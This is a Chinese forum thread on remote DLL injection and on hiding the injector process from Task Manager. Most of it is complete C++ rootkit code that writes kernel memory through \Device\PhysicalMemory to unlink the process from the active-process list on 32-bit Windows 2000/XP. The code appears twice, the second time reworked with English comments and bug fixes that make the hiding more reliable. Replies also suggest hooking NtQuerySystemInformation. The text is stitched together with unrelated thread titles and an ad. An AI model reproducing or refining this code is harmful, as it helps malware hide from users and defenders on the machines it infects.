dll远程注入的问题。 本帖最后由 groundhappy 于 2011-09-02 15:39:03 编辑 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 既然要注入一个特定进程,注入前自然要检查exe是否在,所以需要一个线程来轮询..2. LoadLibrary是动态加载,进程启动后也可以再动态加载dll 既然要注入一个特定进程,注入前自然要检查exe是否在,所以需要一个线程来轮询..学习 http://hi.baidu.com/43755979/blog/item/73b35eddcbaab7db8d1029e2.html希望对你有帮助~ Windows核心编程一书上有一章专门讲这个的,还算比较相信的,不妨看一下 利用Hook技术截获LoadLibrary函数。 那假设我要注入到IE浏览器里面。那我还是要先写一个exe来判断是否运行了IE来决定是否注入我的DLL啊。。那在任务管理器里面必定有我写的这个EXE的进程啊,,那又有什么隐藏意义可言,至少在我运行IE前在任务管理器里还是可以看到这个注入DLL的exe程序啊?? 确实需要一个exe进程,不过这个exe相对于那个dll来说被杀的可能性还是小的楼主也可以尝试下通过hook来隐藏下这个exe进程我觉得书上讲的不一定就是我们非要可以用这个来干什么事情了,只是介绍下这种方法吧,到后面通过自己知识的积累技术的提升结合其他方面来真正完成某件事 HOOK隐藏。。什么原理,,如何实现??。。3q 头文件:////////////////////////////////////////HideProcess.hBOOL HideProcess(); CPP源文件:///////////////////////////////////////////////////////////////////////////////HideProcess.cpp#include<windows.h>#include<Accctrl.h>#include<Aclapi.h>#include"HideProcess.h"#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)typedef LONG NTSTATUS;typedef struct _IO_STATUS_BLOCK { NTSTATUS Status; ULONG Information;} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer;} UNICODE_STRING, *PUNICODE_STRING;#define OBJ_INHERIT 0x00000002L#define OBJ_PERMANENT 0x00000010L#define OBJ_EXCLUSIVE 0x00000020L#define OBJ_CASE_INSENSITIVE 0x00000040L#define OBJ_OPENIF 0x00000080L#define OBJ_OPENLINK 0x00000100L#define OBJ_KERNEL_HANDLE 0x00000200L#define OBJ_VALID_ATTRIBUTES 0x000003F2Ltypedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes );typedef VOID (CALLBACK* 
RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString );RTLINITUNICODESTRING RtlInitUnicodeString;ZWOPENSECTION ZwOpenSection;HMODULE g_hNtDLL = NULL;PVOID g_pMapPhysicalMemory = NULL;HANDLE g_hMPM = NULL;OSVERSIONINFO g_osvi;//---------------------------------------------------------------------------BOOL InitNTDLL(){ g_hNtDLL = LoadLibrary("ntdll.dll"); if (NULL == g_hNtDLL) return FALSE; RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,"RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); return TRUE;}//---------------------------------------------------------------------------VOID CloseNTDLL(){ if(NULL != g_hNtDLL) FreeLibrary(g_hNtDLL); g_hNtDLL = NULL;}//---------------------------------------------------------------------------VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) { PACL pDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,NULL, &pDacl, NULL, &pSD); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } EXPLICIT_ACCESS ea; RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance= NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } dwRes = SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); }} //---------------------------------------------------------------------------HANDLE OpenPhysicalMemory(){ NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; 
ULONG PhyDirectory; g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx (&g_osvi); if (5 != g_osvi.dwMajorVersion) return NULL; switch(g_osvi.dwMinorVersion) { case 0: PhyDirectory = 0x30000; break; //2k case 1: PhyDirectory = 0x39000; break; //xp default: return NULL; } RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory"); attributes.Length = sizeof(OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = &physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL; status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); if(status == STATUS_ACCESS_DENIED) { status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); } if(!NT_SUCCESS(status)) return NULL; g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,0x1000); if( g_pMapPhysicalMemory == NULL ) return NULL; return g_hMPM;}//---------------------------------------------------------------------------PVOID LinearToPhys(PULONG BaseAddress, PVOID addr){ ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr; PGDE = BaseAddress[VAddr>>22]; if (0 == (PGDE&1)) return 0; ULONG tmp = PGDE & 0x00000080; if (0 != tmp) { PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF); } else { PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; if (0 == (PTE&1)) return 0; PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF); UnmapViewOfFile((PVOID)PGDE); } return (PVOID)PAddr;}//---------------------------------------------------------------------------ULONG GetData(PVOID addr){ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &0xfffff000, 0x1000); if (0 == tmp) 
return 0; ULONG ret = tmp[(phys & 0xFFF)>>2]; UnmapViewOfFile(tmp); return ret;}//---------------------------------------------------------------------------BOOL SetData(PVOID addr,ULONG data){ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (0 == tmp) return FALSE; tmp[(phys & 0xFFF)>>2] = data; UnmapViewOfFile(tmp); return TRUE;}//---------------------------------------------------------------------------long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp){ ExitProcess(0); return 1 ;}//---------------------------------------------------------------------------BOOL YHideProcess(){// SetUnhandledExceptionFilter(exeception); if (FALSE == InitNTDLL()) return FALSE; if (0 == OpenPhysicalMemory()) return FALSE; ULONG thread = GetData((PVOID)0xFFDFF124); //kteb ULONG process = GetData(PVOID(thread + 0x44)); //kpeb ULONG fw, bw; if (0 == g_osvi.dwMinorVersion) { fw = GetData(PVOID(process + 0xa0)); bw = GetData(PVOID(process + 0xa4)); } if (1 == g_osvi.dwMinorVersion) { fw = GetData(PVOID(process + 0x88)); bw = GetData(PVOID(process + 0x8c)); } SetData(PVOID(fw + 4), bw); SetData(PVOID(bw), fw); CloseHandle(g_hMPM); CloseNTDLL(); return TRUE;}BOOL HideProcess(){static BOOL b_hide = false;if (!b_hide){ b_hide = true; YHideProcess(); return true;}return true;} 然后在需要隐藏进程的时候#incoude"HideProcess.h",调用HideProcess()即可。 写驱动hook ssdt的NtQuerySystemInformation可以实现不过这又要加载驱动了r3下也可以Hook NtQuerySystemInformation不过麻烦多了建议楼主去看下api拦截的东西 error C2440: “=”: 无法从“DeviceInfoList *”转换为“LPCWSTR” 奇怪问题: 新建MDI程序,然后改变视图为基于FormView类的试图后,改视图接收不到鼠标消息?? 救我啊,谢谢!!!!旋转好的图片无法保存!!! 关于Mailbox名称的编码 高分求救:关于视频文件的问题 如何制作UNICODE版程序 Smart card logon wininet提交请求10分钟失效问题 一个关于位图的问题! matlab 一个对话框里,按下一个按钮,实现关闭自身再重新打开,有办法吗? 在做一个动态库时,有以下三个选项,它们有何不同?
希望对你有帮助~
楼主也可以尝试通过 hook 来隐藏这个 exe 进程。我觉得书上讲的不一定就是非要用它来干什么事情,只是介绍一下这种方法;以后通过自己知识的积累、技术的提升,再结合其他方面,才能真正完成某件事。
//HideProcess.h
// Attempts to hide the calling process by unlinking it from the kernel's
// active-process list through \Device\PhysicalMemory (see HideProcess.cpp).
// Only the first call per process does anything; later calls are no-ops.
// Windows 2000 / XP, 32-bit only.
BOOL HideProcess();
CPP源文件:
/////////////////////////////////////////////////////////////////////////////
//HideProcess.cpp
#include <windows.h>
#include <Accctrl.h>
#include <Aclapi.h>
#include "HideProcess.h"

// ---------------------------------------------------------------------------
// Hand-declared subset of the native (ntdll) API used by this file.  The
// layouts are the 32-bit ones; everything below (ULONG-sized pointers,
// 4-byte page-table entries) assumes a 32-bit NT5 kernel.
// ---------------------------------------------------------------------------
typedef LONG NTSTATUS;

// A non-negative NTSTATUS means success.
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED        ((NTSTATUS)0xC0000022L)

// Not used by this file; kept for completeness of the native declarations.
typedef struct _IO_STATUS_BLOCK
{
    NTSTATUS Status;
    ULONG    Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
    USHORT Length;          // bytes, without terminator
    USHORT MaximumLength;   // bytes available in Buffer
    PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// OBJECT_ATTRIBUTES.Attributes flags (only 0 is used in this file).
#define OBJ_INHERIT          0x00000002L
#define OBJ_PERMANENT        0x00000010L
#define OBJ_EXCLUSIVE        0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF           0x00000080L
#define OBJ_OPENLINK         0x00000100L
#define OBJ_KERNEL_HANDLE    0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

// Prototypes of the two ntdll exports resolved at runtime by InitNTDLL().
typedef NTSTATUS (CALLBACK *ZWOPENSECTION)(
    OUT PHANDLE           SectionHandle,
    IN  ACCESS_MASK       DesiredAccess,
    IN  POBJECT_ATTRIBUTES ObjectAttributes);

typedef VOID (CALLBACK *RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN     PCWSTR          SourceString);

// ---------------------------------------------------------------------------
// Module state.
// ---------------------------------------------------------------------------
RTLINITUNICODESTRING RtlInitUnicodeString;   // filled in by InitNTDLL()
ZWOPENSECTION        ZwOpenSection;          // filled in by InitNTDLL()

HMODULE       g_hNtDLL             = NULL;   // ntdll.dll reference held between InitNTDLL/CloseNTDLL
PVOID         g_pMapPhysicalMemory = NULL;   // 4 KiB view of the page directory mapped by OpenPhysicalMemory()
HANDLE        g_hMPM               = NULL;   // section handle for \Device\PhysicalMemory
OSVERSIONINFO g_osvi;                        // OS version, used to pick kernel offsets
//---------------------------------------------------------------------------
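// Load ntdll.dll and resolve the two native exports this file calls.
// Returns FALSE if the module or either export cannot be found; in that
// case g_hNtDLL is left NULL and the function pointers stay NULL, so the
// caller never ends up calling through an unresolved pointer (the original
// did not check GetProcAddress at all).
BOOL InitNTDLL()
{
    // Narrow literal, so use the A variant explicitly: this keeps the call
    // valid in a UNICODE build as well.
    g_hNtDLL = LoadLibraryA("ntdll.dll");
    if (NULL == g_hNtDLL)
        return FALSE;

    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");
    ZwOpenSection        = (ZWOPENSECTION)GetProcAddress(g_hNtDLL, "ZwOpenSection");

    // Either export missing means nothing else in this file can work; undo the load.
    if (NULL == RtlInitUnicodeString || NULL == ZwOpenSection)
    {
        RtlInitUnicodeString = NULL;
        ZwOpenSection = NULL;
        FreeLibrary(g_hNtDLL);
        g_hNtDLL = NULL;
        return FALSE;
    }
    return TRUE;
}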
//---------------------------------------------------------------------------
// Drop the ntdll.dll reference taken by InitNTDLL().  Harmless to call when
// nothing is loaded: g_hNtDLL is simply left at NULL.
VOID CloseNTDLL()
{
    HMODULE hMod = g_hNtDLL;
    g_hNtDLL = NULL;
    if (hMod != NULL)
        FreeLibrary(hMod);
}
//---------------------------------------------------------------------------
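// Grant the calling user SECTION_MAP_WRITE on hSection by appending one
// ACE to the section's DACL.  hSection must have been opened with
// READ_CONTROL|WRITE_DAC (see OpenPhysicalMemory()).  Failures are
// abandoned silently -- the function returns VOID, as before -- but the
// buffers handed out by GetSecurityInfo/SetEntriesInAcl are now freed
// exactly once on every path.
//
// Bugs fixed: the original fell through after each failed call, so
// SetEntriesInAcl/SetSecurityInfo ran with NULL inputs after an earlier
// failure, and pSD/pNewDacl were never freed on the success path.
//
// Security note: this rewrites the DACL of a kernel object
// (\Device\PhysicalMemory in this file) and needs WRITE_DAC on it, which
// normally only an administrator holds.
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl = NULL;                  // points into pSD; not freed separately
    PACL pNewDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;

    DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                                  NULL, NULL, &pDacl, NULL, &pSD);
    if (ERROR_SUCCESS == dwRes)
    {
        EXPLICIT_ACCESS ea;
        RtlZeroMemory(&ea, sizeof(ea));
        ea.grfAccessPermissions = SECTION_MAP_WRITE;
        ea.grfAccessMode        = GRANT_ACCESS;
        ea.grfInheritance       = NO_INHERITANCE;
        ea.Trustee.TrusteeForm  = TRUSTEE_IS_NAME;
        ea.Trustee.TrusteeType  = TRUSTEE_IS_USER;
        // "CURRENT_USER" is the special trustee name SetEntriesInAcl resolves
        // to the caller's own account.  TEXT()/cast keep this valid in both
        // ANSI and UNICODE builds.
        ea.Trustee.ptstrName = (LPTSTR)TEXT("CURRENT_USER");

        dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
        if (ERROR_SUCCESS == dwRes)
        {
            // Result deliberately ignored, as in the original: the caller
            // retries the open and discovers failure there.
            SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                            NULL, NULL, pNewDacl, NULL);
        }
    }

    if (pNewDacl)
        LocalFree(pNewDacl);
    if (pSD)
        LocalFree(pSD);
}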
//---------------------------------------------------------------------------
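// Open \Device\PhysicalMemory for read/write and map the 4 KiB page the
// original author hard-codes as the kernel page directory (0x30000 on
// Windows 2000, 0x39000 on XP).  On success returns the section handle and
// leaves the view in g_pMapPhysicalMemory; on any failure returns NULL with
// g_hMPM closed.
//
// If the first open is denied, the section is reopened for DAC editing,
// the caller is granted SECTION_MAP_WRITE, and the open is retried.
//
// NOTE(review): the version check refuses anything but 5.0/5.1, but even on
// those versions the page-directory constant and the ability of user mode to
// open \Device\PhysicalMemory at all are build/service-pack dependent --
// verify on the exact target before relying on this.
//
// Bugs fixed: the retry path called SetPhyscialMemorySectionCanBeWrited and
// CloseHandle on g_hMPM without checking that the WRITE_DAC open succeeded;
// the section handle leaked when MapViewOfFile failed; GetVersionEx's
// result was never checked.
HANDLE OpenPhysicalMemory()
{
    NTSTATUS          status;
    UNICODE_STRING    physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG             PhyDirectory;

    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    if (!GetVersionEx(&g_osvi))
        return NULL;
    if (5 != g_osvi.dwMajorVersion)
        return NULL;

    switch (g_osvi.dwMinorVersion)
    {
    case 0:
        PhyDirectory = 0x30000;   // Windows 2000 (author's constant)
        break;
    case 1:
        PhyDirectory = 0x39000;   // Windows XP (author's constant)
        break;
    default:
        return NULL;
    }

    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
    attributes.Length                   = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory            = NULL;
    attributes.ObjectName               = &physmemString;
    attributes.Attributes               = 0;
    attributes.SecurityDescriptor       = NULL;
    attributes.SecurityQualityOfService = NULL;

    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
    if (status == STATUS_ACCESS_DENIED)
    {
        // Not writable for this user: reopen for DAC editing, add an ACE for
        // ourselves, then retry the read/write open.
        status = ZwOpenSection(&g_hMPM, READ_CONTROL | WRITE_DAC, &attributes);
        if (!NT_SUCCESS(status))
        {
            g_hMPM = NULL;
            return NULL;
        }
        SetPhyscialMemorySectionCanBeWrited(g_hMPM);
        CloseHandle(g_hMPM);
        g_hMPM = NULL;
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
    }
    if (!NT_SUCCESS(status))
    {
        g_hMPM = NULL;
        return NULL;
    }

    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE,
                                         0, PhyDirectory, 0x1000);
    if (g_pMapPhysicalMemory == NULL)
    {
        CloseHandle(g_hMPM);   // do not leak the section handle
        g_hMPM = NULL;
        return NULL;
    }
    return g_hMPM;
}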
//---------------------------------------------------------------------------
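// Translate a virtual address to a physical address by walking 32-bit,
// non-PAE two-level page tables.  BaseAddress is a mapped 4 KiB view of the
// page directory (g_pMapPhysicalMemory); the page-table page named by the
// PDE is mapped temporarily through g_hMPM.  Returns 0 when the PDE or PTE
// is not present, or when the page-table page cannot be mapped.
//
// NOTE(review): the walk assumes 4-byte PDEs/PTEs (10/10/12 split).  With
// PAE the entries are 8 bytes and this returns garbage; nothing here
// detects that.  Physical addresses are truncated to 32 bits.
//
// Bugs fixed: the MapViewOfFile result was dereferenced without a NULL
// check, and the view leaked when the PTE turned out to be not-present.
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr;

    ULONG PDE = BaseAddress[VAddr >> 22];
    if (0 == (PDE & 1))                 // present bit clear
        return 0;

    if (0 != (PDE & 0x00000080))        // PS bit: 4 MiB large page, no PTE level
        return (PVOID)((PDE & 0xFFC00000) + (VAddr & 0x003FFFFF));

    // Map the page-table page and pick the PTE for this address.
    // 4 == FILE_MAP_READ, which is what the original passed.
    PULONG pageTable = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0,
                                             PDE & 0xFFFFF000, 0x1000);
    if (NULL == pageTable)
        return 0;
    ULONG PTE = pageTable[(VAddr & 0x003FF000) >> 12];
    UnmapViewOfFile(pageTable);

    if (0 == (PTE & 1))                 // present bit clear
        return 0;
    return (PVOID)((PTE & 0xFFFFF000) + (VAddr & 0x00000FFF));
}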
//---------------------------------------------------------------------------
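// Read one 32-bit value at kernel virtual address addr through the
// physical-memory section.  Returns 0 when the address does not translate
// or the page cannot be mapped; callers cannot tell that apart from a
// genuine 0, so they must treat 0 as "unusable".
//
// Bug fixed: a failed translation (LinearToPhys() == 0) previously went on
// to map and read physical page 0 instead of reporting failure.
ULONG GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (0 == phys)
        return 0;

    // A read-only view suffices here (the original also asked for write).
    PULONG page = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0,
                                        phys & 0xFFFFF000, 0x1000);
    if (NULL == page)
        return 0;

    ULONG value = page[(phys & 0xFFF) >> 2];
    UnmapViewOfFile(page);
    return value;
}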
//---------------------------------------------------------------------------
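// Write one 32-bit value to kernel virtual address addr through the
// physical-memory section.  Returns FALSE when the address does not
// translate or the page cannot be mapped for writing.
//
// Bug fixed: a failed translation (LinearToPhys() == 0) previously led to a
// blind write into physical page 0.
BOOL SetData(PVOID addr, ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (0 == phys)
        return FALSE;

    PULONG page = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0,
                                        phys & 0xFFFFF000, 0x1000);
    if (NULL == page)
        return FALSE;

    page[(phys & 0xFFF) >> 2] = data;
    UnmapViewOfFile(page);
    return TRUE;
}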
//---------------------------------------------------------------------------
// Unhandled-exception filter: terminates the process quietly instead of
// letting the crash dialog appear.  Not installed by default -- the
// SetUnhandledExceptionFilter call in YHideProcess() is commented out.
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
    (void)tmp;
    ExitProcess(0);
    return EXCEPTION_EXECUTE_HANDLER;   // == 1; never reached after ExitProcess
}
//---------------------------------------------------------------------------
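// Unlink the current process from the kernel's active-process list by
// writing kernel memory through \Device\PhysicalMemory (DKOM).  This is a
// rootkit technique for 32-bit Windows 2000/XP only; every address below is
// a constant the original author chose and must be checked against the
// exact kernel build:
//   0xFFDFF124          -> read as the current thread ("kteb" in the original)
//   thread  + 0x44      -> read as the owning process ("kpeb")
//   process + 0xa0/0xa4 -> 2000: list Flink/Blink
//   process + 0x88/0x8c -> XP:   list Flink/Blink
// Interpreting fw/bw as a LIST_ENTRY {Flink, Blink}, the two writes do
//   next->Blink = prev;  prev->Flink = next;
// The process's own entry is left pointing at its former neighbours.
//
// Returns TRUE only if both list writes were issued successfully; FALSE if
// any lookup or write failed.  Handles and views are released on every path.
//
// Bugs fixed: fw/bw were used uninitialized for unknown minor versions; a
// failed read (GetData() -> 0) propagated into SetData() calls on bogus
// addresses, i.e. blind writes to physical memory; the ntdll reference and
// the page-directory view were leaked on failure paths.
BOOL YHideProcess()
{
    // SetUnhandledExceptionFilter(exeception);   // left disabled, as in the original

    if (FALSE == InitNTDLL())
        return FALSE;

    if (0 == OpenPhysicalMemory())
    {
        CloseNTDLL();
        return FALSE;
    }

    BOOL  ok = FALSE;
    ULONG fw = 0, bw = 0;

    ULONG thread  = GetData((PVOID)0xFFDFF124);
    ULONG process = (0 != thread) ? GetData(PVOID(thread + 0x44)) : 0;
    if (0 != process)
    {
        if (0 == g_osvi.dwMinorVersion)          // Windows 2000
        {
            fw = GetData(PVOID(process + 0xa0));
            bw = GetData(PVOID(process + 0xa4));
        }
        else if (1 == g_osvi.dwMinorVersion)     // Windows XP
        {
            fw = GetData(PVOID(process + 0x88));
            bw = GetData(PVOID(process + 0x8c));
        }
    }

    // Touch kernel memory only if every pointer on the way resolved.  The
    // second write is skipped if the first one fails, so the list is never
    // left half-unlinked by a mapping failure.
    if (0 != fw && 0 != bw)
        ok = SetData(PVOID(fw + 4), bw) && SetData(PVOID(bw), fw);

    if (g_pMapPhysicalMemory != NULL)
    {
        UnmapViewOfFile(g_pMapPhysicalMemory);
        g_pMapPhysicalMemory = NULL;
    }
    CloseHandle(g_hMPM);
    g_hMPM = NULL;
    CloseNTDLL();
    return ok;
}

// Public entry point.  Runs YHideProcess() at most once per process and
// returns what that attempt reported; later calls return the cached result
// without touching the kernel again.  (The original always returned TRUE,
// so callers could not detect a failed hide.)
BOOL HideProcess()
{
    static BOOL b_hide = FALSE;
    static BOOL b_result = FALSE;
    if (!b_hide)
    {
        b_hide = TRUE;             // set before the call so re-entry is a no-op
        b_result = YHideProcess();
    }
    return b_result;
}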
然后在需要隐藏进程的地方 #include "HideProcess.h",调用 HideProcess() 即可。注意:上述代码只针对 32 位的 Windows 2000/XP,依赖用户态能打开 \Device\PhysicalMemory 以及写死的内核偏移,换了系统版本就不能用了。
不过这又需要加载驱动了。
R3(用户态)下也可以 hook NtQuerySystemInformation,不过麻烦多了;建议楼主去看看 API 拦截方面的资料。